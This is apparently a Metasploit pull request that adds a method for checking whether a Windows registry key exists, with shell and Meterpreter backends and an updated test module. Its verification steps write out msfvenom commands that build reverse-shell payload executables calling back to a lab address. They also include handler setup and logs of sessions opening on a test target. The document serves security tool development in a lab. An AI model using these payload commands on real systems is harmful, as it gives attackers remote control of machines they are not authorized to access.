### PR TITLE
Fix #3859 Add support for registry_key_exist?

### DIFF
--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -145,6 +145,19 @@ module Registry
     end
   end
 
+  # Checks if a key exists on the target registry
+  #
+  # @param key [String] the full path of the key to check
+  # @return [Boolean] true if the key exists on the target registry, false otherwise
+  #   (also in case of error)
+  def registry_key_exist?(key)
+    if session_has_registry_ext
+      meterpreter_registry_key_exist?(key)
+    else
+      shell_registry_key_exist?(key)
+    end
+  end
+
 protected
 
   #
@@ -310,6 +323,26 @@ protected
     shell_registry_cmd_result("add /f \"#{key}\" /v \"#{valname}\" /t \"#{type}\" /d \"#{data}\" /f", view)
   end
 
+  # Checks if a key exists on the target registry using a shell session
+  #
+  # @param key [String] the full path of the key to check
+  # @return [Boolean] true if the key exists on the target registry, false otherwise,
+  #   even if case of error (invalid arguments) or the session hasn't permission to
+  #   access the key
+  def shell_registry_key_exist?(key)
+    begin
+      key = normalize_key(key)
+    rescue ArgumentError
+      return false
+    end
+
+    results = shell_registry_cmd("query \"#{key}\"")
+    if results =~ /ERROR: /i
+      return false
+    else
+      return true
+    end
+  end
 
   ##
   # Meterpreter-specific registry manipulation methods
@@ -513,6 +546,27 @@ protected
     rescue Rex::Post::Meterpreter::RequestError => e
       return nil
     end
+  end
+
+  # Checks if a key exists on the target registry using a meterpreter session
+  #
+  # @param key [String] the full path of the key to check
+  # @return [Boolean] true if the key exists on the target registry, false otherwise
+  #   (also in case of error)
+  def meterpreter_registry_key_exist?(key)
+    begin
+      root_key, base_key = session.sys.registry.splitkey(key)
+    rescue ArgumentError
+      return false
+    end
+
+    begin
+      check = session.sys.registry.check_key_exists(root_key, base_key)
+    rescue Rex::Post::Meterpreter::RequestError, TimesoutError
+      return false
+    end
+
+    check
   end
 
   #

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -77,6 +77,22 @@ class Registry
         client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
   end
 
+  # Checks if a key exists on the target registry
+  #
+  # @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
+  # @param base_key [String] the base part of the key path
+  # @return [Boolean] true if the key exists on the target registry, false otherwise, even
+  #   it the session hasn't permissions to access the target key.
+  # @raise [TimeoutError] if the timeout expires when waiting the answer
+  # @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
+  def Registry.check_key_exists(root_key, base_key)
+    request = Packet.create_request('stdapi_registry_check_key_exists')
+    request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
+    request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
+    response = client.send_request(request)
+    return response.get_tlv(TLV_TYPE_BOOL).value
+  end
+
   #
   # Opens the supplied registry key on the specified remote host. Requires that the
   # current process has credentials to access the target and that the target has the

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -31,8 +31,7 @@ class Metasploit3 < Msf::Post
   end
 
   def test_0_registry_read
-    pending "should evaluate key existence" do
-      # these methods are not implemented
+    it "should evaluate key existence" do
       k_exists = registry_key_exist?(%q#HKCU\Environment#)
       k_dne    = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
 


### PR DESCRIPTION
See #3859 for a complete description. Meterpreter supports `request_registry_check_key_exists` but it's unsupported on the ruby side. This pull requests adds the ruby support side.
## Verification
- [x] Install a Windows 7 SP1 (32 bits) as target
- [x] Create a meterpreter payload embedded into an exe

```
./msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.158.1 lport=4444 -f exe -o /tmp/my_payload.exe
```
- [x] Create a shell payload embedded into an exe

```
./msfvenom -p windows/shell/reverse_tcp lhost=172.16.158.1 lport=4444 -f exe -o /tmp/my_payload_shell.exe
```
- [x] Get a meterpreter session on the target with the help of exploit/multi/handler 

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:50978) at 2015-10-22 16:12:26 -0500

meterpreter > background
msf exploit(handler) >
```
- [x] Get a shell session on the target with the help of exploit/multi/handler

```
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.158.132
[*] Command shell session 2 opened (172.16.158.1:4444 -> 172.16.158.132:50979) at 2015-10-22 16:12:58 -0500

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Juan Vazquez\Desktop>^Z
Background session 2? [y/N]  y
```
- [x] Load the test modules

```
msf exploit(handler) > loadpath test/modules
Loaded 34 modules:
    13 auxiliarys
    13 exploits
    8 posts
```
- [x] Use `post/test/registry` on the meterpreter session, all the tests should pass. VERIFY which the test `should evaluate key existence` pass

```
msf exploit(handler) > use post/test/registry
msf post(registry) > set session 1
session => 1
msf post(registry) > run

[*] Running against session 1
[*] Session type is meterpreter and platform is x86/win32
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should return normalized values
[+] should enumerate keys and values
[+] should create keys
[+] should write REG_SZ values
[+] should write REG_DWORD values
[+] should delete keys
[*] Passed: 8; Failed: 0
[*] Post module execution completed
```
- [x] Use `post/test/registry` on the shell session, **not** all the tests will pass (just 2). VERIFY which the test `should evaluate key existence` **pass**

```
msf post(registry) > set session 2
session => 2
msf post(registry) > run

[*] Running against session 2
[*] Session type is shell and platform is windows
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[-] FAILED: should read values
[-] FAILED: should return normalized values
[+] should enumerate keys and values
[-] FAILED: should create keys
[-] FAILED: should write REG_SZ values
[-] FAILED: should write REG_DWORD values
[-] FAILED: should delete keys
[-] Passed: 2; Failed: 6
[*] Post module execution completed
```
